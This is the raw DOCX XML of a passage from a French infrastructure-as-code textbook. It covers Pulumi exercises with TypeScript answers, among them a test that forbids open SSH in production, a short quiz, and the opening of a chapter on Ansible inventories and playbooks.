          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Règles et calculs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Preview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Erreurs de configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Problèmes réels de déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Cas imprévus</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TERRAFORM OU PULUMI</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 langage de l'équipe est-il un langage généraliste maîtrisé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Y a-t-il des règles métier complexes à exprimer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L'équipe préfère-t-elle un DSL limité ou un langage complet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Les outils existants (politiques, modules) sont-ils réutilisables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Qui maintiendra la configuration dans deux ans ?</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Pulumi suit le même cycle que Terraform, avec un langage généraliste.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références entre objets construisent le graphe de dépendances.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Config et exports remplacent variables et sorties.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langage permet des boucles et des conditions naturelles.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langage complet n'exempte pas de lisibilité.</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secrets sont chiffrés dans l'état.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L'infrastructure se teste comme du code.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test d'intégration sur pile jetable est la preuve la plus forte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'infrastructure est décrite. Le chapitre suivant configure ce qui est déjà en place : Ansible.</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75.1 — Décrire un réseau en TypeScript</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 VPC et deux sous-réseaux doivent être créés.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Utilisez une boucle.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Étiquetez chaque ressource.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Exportez les identifiants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 75.2 — Ajouter une règle métier</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Le nombre d'instances dépend de l'environnement.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Définissez une table.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Validez l'environnement.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Testez la fonction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 75.3 — Tester avant de déployer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une règle interdit les ports 22 ouverts à tous en production.</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Écrivez un test sur la fonction de règles.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Ajoutez un contrôle dans la CI.</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le cas contraire.</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75.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>const zones = ["eu-west-3a", "eu-west-3b"];</w:t>
        <w:br/>
        <w:br/>
        <w:t>const sousReseaux = zones.map((zone, i) =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  new aws.ec2.Subnet(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>subnet-${i}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    vpcId: vpc.id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cidrBlock: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.0.${i + 1}.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    availabilityZone: zone,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    tags: { Projet: "demo", Environnement: environnement, Zone: zone },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  })</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:br/>
        <w:t>export const sousReseauIds = sousReseaux.map((s) =&gt; s.id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une boucle remplace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et rend le lien entre zone et CIDR explicite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les sorties exportées servent aux autres piles ou aux applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 75.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>const dimensionnement = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dev:     { type: "t3.micro",  replicas: 1 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  staging: { type: "t3.small",  replicas: 2 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  prod:    { type: "t3.small",  replicas: 3 },</w:t>
        <w:br/>
        <w:t>} as const;</w:t>
        <w:br/>
        <w:br/>
        <w:t>export function dimensionner(env: string) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const plan = dimensionnement[env as keyof typeof dimensionnement];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!plan) throw new Error(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Environnement inconnu : ${env}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return plan;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La table centralise les décisions : une seule ligne à modifier pour ajuster un environnement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'erreur explicite évite une valeur par défaut dangereuse en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 75.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>import { reglesSecurite } from "./infra";</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("n'ouvre pas SSH en production", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const regles = reglesSecurite("prod");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(regles.some((r) =&gt; r.fromPort === 22)).toBe(false);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("autorise SSH en développement", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const regles = reglesSecurite("dev");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(regles.some((r) =&gt; r.fromPort === 22)).toBe(true);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test qui échoue bloque la CI et empêche la création de la règle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tester aussi le cas où l'ouverture est légitime évite de bloquer les environnements de développement.</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 langage peut-on utiliser avec Pulumi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Uniquement YAML</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TypeScript, Python, Go, C#</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Uniquement HCL</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Uniquement Go</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 xml:space="preserve">Quel est l'équivalent de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>terraform plan</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pulumi up</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pulumi preview</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pulumi destroy</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pulumi config</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Où sont stockés les secrets Pulumi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En clair dans le code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Chiffrés dans l'état</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 xml:space="preserve">Dans un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.env</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Dans les journaux</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Quel risque introduit un langage généraliste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Moins de tests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Des abstractions illisibles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Moins de fournisseurs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Aucun</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Pulumi propose plusieurs langages généralistes.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>preview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calcule le diff sans appliquer.</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La configuration secrète est chiffrée avec le fournisseur de chiffrement.</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La liberté d'écrire du code complexe doit être maîtrisée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>76. Ansible : configuration et idempotence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Décrire l'état d'une machine et l'appliquer autant de fois que nécessaire, sans effet secondaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 75</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Écrire un inventaire et un playbook.</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Comprendre l'idempotence des modules.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Utiliser les variables, les rôles et les modèles.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Gérer les secrets avec un coffre.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Vérifier une exécution sans la subir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>76.1 Un inventaire, un playbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible se connecte en SSH, sans agent installé sur les cibles. Un inventaire liste les hôtes ; un playbook décrit les tâches à appliquer. Chaque module est idempotent : le rejouer ne change rien si l'état est déjà correct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un inventaire simple · ini</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inventaire.ini</w:t>
        <w:br/>
        <w:t>[web]</w:t>
        <w:br/>
        <w:t>web1.exemple.fr</w:t>
        <w:br/>
        <w:t>web2.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t>[db]</w:t>
        <w:br/>
        <w:t>db1.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t>[prod:children]</w:t>
        <w:br/>
        <w:t>web</w:t>
        <w:br/>
        <w:t>db</w:t>
        <w:br/>
        <w:br/>
        <w:t>[prod:vars]</w:t>
        <w:br/>
        <w:t>timezone=Africa/Porto-Novo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un playbook complet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playbook.yml</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>- name: Configurer les serveurs web</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hosts: web</w:t>
        <w:br/>
        <w:t xml:space="preserve">  become: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  vars:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    paquets: [nginx, chrony, ufw]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  tasks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: Installer les paquets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.apt:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: "{{ paquets }}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: present</w:t>
        <w:br/>
        <w:t xml:space="preserve">        update_cache: true</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    - name: Déployer la configuration Nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        src: templates/site.conf.j2</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dest: /etc/nginx/sites-available/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        mode: "0644"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      notify: Recharger nginx</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    - name: Activer le site</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.file:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        src: /etc/nginx/sites-available/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dest: /etc/nginx/sites-enabled/site.conf</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: link</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  handlers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: Recharger nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ansible.builtin.service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">        state: reloaded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.285 — Six éléments d'un playbook</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39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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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323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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Groupe d'inventaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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become</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Élévation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Équivalent de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
